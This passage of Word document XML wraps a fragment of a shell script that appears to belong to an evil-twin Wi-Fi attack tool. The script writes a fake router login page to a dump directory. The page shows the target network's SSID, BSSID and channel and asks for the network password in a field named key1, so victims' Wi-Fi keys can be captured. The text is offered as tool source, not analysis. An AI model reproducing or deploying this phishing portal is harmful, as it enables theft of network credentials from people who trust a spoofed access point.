    <w:p w14:paraId="226803B0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B623BA6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">      &lt;div class=ui-block-b&gt;&lt;b&gt;$Host_SSID&lt;/b&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5297186F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09913EF5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">      &lt;div class=ui-block-a&gt;BSSID:&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2428EE4F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="514B141B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">      &lt;div class=ui-block-b&gt;&lt;b&gt;$Host_MAC&lt;/b&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484F2D9E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2095F020" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">      &lt;div class=ui-block-a&gt;Chan:&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3329BA6B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E15696" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">      &lt;div class=ui-block-b&gt;&lt;b&gt;$Host_CHAN&lt;/b&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C3AFC6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="633B45B9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EEC1B7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298A7ED2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41300326" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F59FDE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">"$DIALOG_WEB_INFO"    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F030A67" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;div data-role=\"fieldcontain\"&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B2C379" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;label for=\"password\"&gt;"$DIALOG_WEB_INPUT"&lt;/label&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F01B953" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202F59C2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;input type=\"password\" value=\"\" name=\"key1\" id=\"key1\"/&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53931F39" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E21ACF1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;input type=\"submit\" data-theme=\"b\" name=\"submit\" id=\"submit\" data-inline=\"true\" value=\""$DIALOG_WEB_SUBMIT"\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF46E37" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;/fieldset&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48353DEC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;/form&gt;             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D957002" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F6DE6F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C01CC5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div data-theme=\"a\" data-role=\"footer\" data-position=\"fixed\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621C803D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7099B8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC627D2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F2866B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;div data-role=\"page\" id=\"second\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1B9CA0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div data-theme=\"a\" data-role=\"header\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D54733A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;h3&gt;&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD54E64" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612D0F65" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B470F5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div data-role=\"content\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5E239F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F896293" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54979D1C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="577310D0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div data-theme=\"a\" data-role=\"footer\" data-position=\"fixed\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7458ED00" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1289195B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309E7161" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49706E5B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;/html&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794663E9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>"&gt;$DUMP_PATH/data/index.htm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C73CD18" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="218FD77B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264A4148" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>######################################### &lt; WEB ARAYUZLERI &gt; ########################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B73875" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="54FD970D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="237862CC" w14:textId="1F98B08E" w:rsidR="00723F98" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">  setresolution &amp;&amp; setinterface</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00723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F98"/>
    <w:rsid w:val="00723F98"/>
    <w:rsid w:val="00E2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AC308-F622-4262-98A9-3BB008C5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168</Pages>
  <Words>40093</Words>
  <Characters>228532</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1904</Lines>
  <Paragraphs>536</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>268089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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-01-02T09:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-02T09:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>